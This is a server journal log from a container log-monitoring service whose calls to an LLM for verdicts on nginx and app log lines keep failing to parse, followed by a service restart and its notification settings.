Mar 19 22:44:48 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:48.647870 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:44:41.593271404Z 98.152.173.124 - - [19/Mar/2026:22:44:41 +0000] "api.admin.kovicloud....
Mar 19 22:44:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:56.016230 [llm] Failed to parse verdict from:
Mar 19 22:44:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:56.016266 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:44:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:56.016275 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:47.603359544Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:44:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:56.673809 [llm] Failed to parse verdict from:
Mar 19 22:44:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:56.673844 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:44:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:56.673853 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:44:45.091324681Z 98.152.173.124 - - [19/Mar/2026:22:44:45 +0000] "api.admin.kovicloud....
Mar 19 22:45:04 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:04.703639 [llm] Failed to parse verdict from:
Mar 19 22:45:04 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:04.703675 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:45:04 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:04.703686 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:44:47.600443246Z 98.152.173.124 - - [19/Mar/2026:22:44:47 +0000] "captain.admin.kovicl...
Mar 19 22:45:07 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:07.141133 [watcher] New container started: srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42 (ec84599232e6)
Mar 19 22:45:07 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:07.141209 [watcher] Streaming logs for srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42 (ec84599232e6)
Mar 19 22:45:07 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:07.893732 [llm] Failed to parse verdict from:
Mar 19 22:45:07 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:07.893790 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:45:07 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:07.893801 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:50.600469337Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:45:14 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:14.426382 [llm] Failed to parse verdict from:
Mar 19 22:45:14 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:14.426419 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:45:14 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:14.426427 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:44:52.776708913Z 98.152.173.124 - - [19/Mar/2026:22:44:52 +0000] "login.admin.koviclou...
Mar 19 22:45:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:15.192801 [observer] Pipeline: processed=66 pattern_hits=45 llm_calls=18 llm_errors=16 learned=0
Mar 19 22:45:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:15.192826 [observer] Patterns: hash=45 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=21
Mar 19 22:45:19 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:19.821007 [llm] Failed to parse verdict from:
Mar 19 22:45:19 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:19.821041 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:45:19 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:19.821050 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:53.595258920Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:45:23 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:23.239063 [llm] Failed to parse verdict from:
Mar 19 22:45:23 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:23.239102 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:45:23 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:23.239111 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:44:52.902043196Z 2026/03/19 22:44:52 [error] 415#415: *741854 open() "/usr/share/nginx...
Mar 19 22:45:29 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:29.018716 [llm] Failed to parse verdict from:
Mar 19 22:45:29 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:29.018754 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:45:29 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:29.018763 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:56.598852416Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:45:32 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:32.302855 [llm] Failed to parse verdict from:
Mar 19 22:45:32 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:32.302889 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:45:32 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:32.302897 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:45:07.553307247Z 2026/03/19 22:45:07 [warn] 1#1: the "listen ... http2" directive is d...
Mar 19 22:45:37 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:37.286974 [llm] Failed to parse verdict from:
Mar 19 22:45:37 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:37.287012 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:45:37 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:37.287021 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:59.602827896Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:45:40 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:40.326500 [llm] Failed to parse verdict from:
Mar 19 22:45:40 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:40.326538 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:45:40 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:40.326547 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:45:07.553368164Z 2026/03/19 22:45:07 [warn] 1#1: the "listen ... http2" directive is d...
Mar 19 22:45:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:45.197812 [observer] Pipeline: processed=86 pattern_hits=58 llm_calls=24 llm_errors=22 learned=0
Mar 19 22:45:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:45.197837 [observer] Patterns: hash=58 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=2 misses=28
Mar 19 22:45:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:45.888889 [llm] Failed to parse verdict from:
Mar 19 22:45:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:45.888927 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:45:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:45.888935 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:02.700580615Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:45:48 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:48.815634 [llm] Failed to parse verdict from:
Mar 19 22:45:48 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:48.815676 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:45:48 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:48.815685 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:45:07.553921959Z 2026/03/19 22:45:07 [warn] 1#1: the "listen ... http2" directive is d...
Mar 19 22:45:54 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:54.298207 [llm] Failed to parse verdict from:
Mar 19 22:45:54 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:54.298245 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:45:54 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:54.298254 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:05.603522536Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:45:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:56.852484 [llm] Failed to parse verdict from:
Mar 19 22:45:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:56.852519 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:45:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:56.852527 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:45:07.558259864Z 98.152.173.124 - - [19/Mar/2026:22:45:07 +0000] "captain.admin.kovicl...
Mar 19 22:46:01 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:01.883370 [llm] Failed to parse verdict from:
Mar 19 22:46:01 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:01.883412 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:46:01 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:01.883420 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:45:07.612713029Z 98.152.173.124 - - [19/Mar/2026:22:45:07 +0000] "captain.admin.kovicl...
Mar 19 22:46:02 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:02.114888 [llm] Failed to parse verdict from:
Mar 19 22:46:02 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:02.114925 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:46:02 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:02.114933 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:08.593854160Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:46:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:09.907974 [llm] Failed to parse verdict from:
Mar 19 22:46:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:09.908009 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:46:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:09.908017 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:45:18.020732918Z 167.99.145.5 - - [19/Mar/2026:22:45:18 +0000] "login.admin.kovicloud....
Mar 19 22:46:10 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:10.056224 [llm] Failed to parse verdict from:
Mar 19 22:46:10 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:10.056261 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:46:10 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:10.056269 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:11.597320314Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:46:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:15.192096 [observer] Pipeline: processed=101 pattern_hits=66 llm_calls=31 llm_errors=30 learned=0
Mar 19 22:46:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:15.192120 [observer] Patterns: hash=66 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=2 misses=35
Mar 19 22:46:19 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:19.172679 [llm] Failed to parse verdict from:
Mar 19 22:46:19 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:19.172715 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:46:19 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:19.172723 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:14.598069720Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:46:26 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:26.302850 [llm] Failed to parse verdict from:
Mar 19 22:46:26 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:26.302896 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:46:26 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:26.302904 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:20.608139198Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:46:35 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:35.135671 [llm] Failed to parse verdict from:
Mar 19 22:46:35 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:35.135701 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:46:35 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:35.135709 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:23.582477182Z GET /api/v2/user/apps/appData/api 304 2.236 ms - -
Mar 19 22:46:44 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:44.768780 [llm] Failed to parse verdict from:
Mar 19 22:46:44 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:44.768832 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:46:44 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:44.768839 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:23.603123971Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:46:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:45.193948 [observer] Pipeline: processed=110 pattern_hits=71 llm_calls=35 llm_errors=34 learned=0
Mar 19 22:46:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:45.193977 [observer] Patterns: hash=71 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=3 misses=39
Mar 19 22:46:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:52.581955 [llm] Failed to parse verdict from:
Mar 19 22:46:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:52.581994 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:46:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:52.582004 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:26.603780201Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:47:01 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:01.531840 [llm] Failed to parse verdict from:
Mar 19 22:47:01 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:01.531886 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:47:01 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:01.531896 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:29.606977752Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:47:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:09.686432 [llm] Failed to parse verdict from:
Mar 19 22:47:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:09.686523 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:47:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:09.686534 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:32.601146077Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:47:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:15.195860 [observer] Pipeline: processed=115 pattern_hits=73 llm_calls=38 llm_errors=37 learned=0
Mar 19 22:47:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:15.195886 [observer] Patterns: hash=73 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=3 misses=42
Mar 19 22:47:17 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:17.566854 [llm] Failed to parse verdict from:
Mar 19 22:47:17 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:17.566892 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:47:17 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:17.566902 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:35.589584185Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:47:26 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:26.203083 [llm] Failed to parse verdict from:
Mar 19 22:47:26 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:26.203117 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:47:26 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:26.203125 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:38.603500995Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:47:39 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:39.358488 [llm] Failed to parse verdict from:
Mar 19 22:47:39 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:39.358520 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:47:39 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:39.358528 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:41.628031754Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:47:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:45.191961 [observer] Pipeline: processed=121 pattern_hits=76 llm_calls=41 llm_errors=40 learned=0
Mar 19 22:47:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:45.191983 [observer] Patterns: hash=76 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=3 misses=45
Mar 19 22:47:47 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:47.277904 [llm] Failed to parse verdict from:
Mar 19 22:47:47 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:47.277939 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:47:47 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:47.277947 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:44.635304354Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 200 ...
Mar 19 22:47:55 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:55.532502 [llm] Failed to parse verdict from:
Mar 19 22:47:55 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:55.532536 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:47:55 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:55.532544 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:47.596703711Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 200 ...
Mar 19 22:48:02 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:02.651391 [llm] Failed to parse verdict from:
Mar 19 22:48:02 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:02.651432 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:48:02 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:02.651441 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:50.593807294Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:48:10 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:10.313680 [llm] Failed to parse verdict from:
Mar 19 22:48:10 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:10.313715 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:48:10 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:10.313724 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:53.600513421Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:48:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:15.195695 [observer] Pipeline: processed=128 pattern_hits=79 llm_calls=45 llm_errors=44 learned=0
Mar 19 22:48:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:15.195718 [observer] Patterns: hash=79 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=3 misses=49
Mar 19 22:48:20 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:20.288407 [llm] Failed to parse verdict from:
Mar 19 22:48:20 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:20.288442 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:48:20 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:20.288451 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:56.600217701Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:48:28 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:28.686629 [llm] Failed to parse verdict from:
Mar 19 22:48:28 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:28.686673 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:48:28 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:28.686681 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:57.034461593Z GET /api/v2/user/apps/appData/api 304 1.906 ms - -
Mar 19 22:48:37 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:37.297355 [llm] Failed to parse verdict from:
Mar 19 22:48:37 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:37.297392 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:48:37 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:37.297402 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:57.868523115Z GET /api/v2/user/apps/appData/api 304 1.857 ms - -
Mar 19 22:48:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:45.196605 [observer] Pipeline: processed=133 pattern_hits=81 llm_calls=48 llm_errors=47 learned=0
Mar 19 22:48:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:45.196697 [observer] Patterns: hash=81 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=3 misses=52
Mar 19 22:48:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:45.380893 [llm] Failed to parse verdict from:
Mar 19 22:48:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:45.380935 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:48:45 ip-172-26-12-110 observer[1562516]: [192B blob data]
Mar 19 22:48:52 ip-172-26-12-110 systemd[1]: Stopping VaultGuardian Observer...
Mar 19 22:48:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:52.943416 [observer] Shutting down...
Mar 19 22:48:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:52.945269 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: LLM request failed: Post "https://api.openai.com/v1/chat/completions": context canceled
Mar 19 22:48:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:52.945302 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:58.726109838Z GET /api/v2/user/projects 304 7.056 ms - -
Mar 19 22:48:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:52.949625 [observer] Final stats: processed=136 pattern_hits=83 llm_calls=49 learned=0
Mar 19 22:48:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:52.949642 [observer] Shutdown complete
Mar 19 22:48:52 ip-172-26-12-110 systemd[1]: observer.service: Deactivated successfully.
Mar 19 22:48:52 ip-172-26-12-110 systemd[1]: Stopped VaultGuardian Observer.
Mar 19 22:48:52 ip-172-26-12-110 systemd[1]: Started VaultGuardian Observer.
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.963709 [observer] VaultGuardian Observer starting...
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.963771 [observer] Normalizer registry initialized
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970243 [observer] Pattern store initialized (4 scopes)
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970268 [observer] Analyzer pipeline ready
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970374 [notifier] Generated default config at /var/lib/observer/notifications.yaml
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970576 [logwatch] Notifications:
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970585 [logwatch]   ✗ webhook    → not configured (set WEBHOOK_URL)
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970590 [logwatch]   ✓ email      → drew@vaultdec.com
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970593 [logwatch]   ✗ sms        → not configured (set TWILIO_SID + ALERT_SMS_TO)
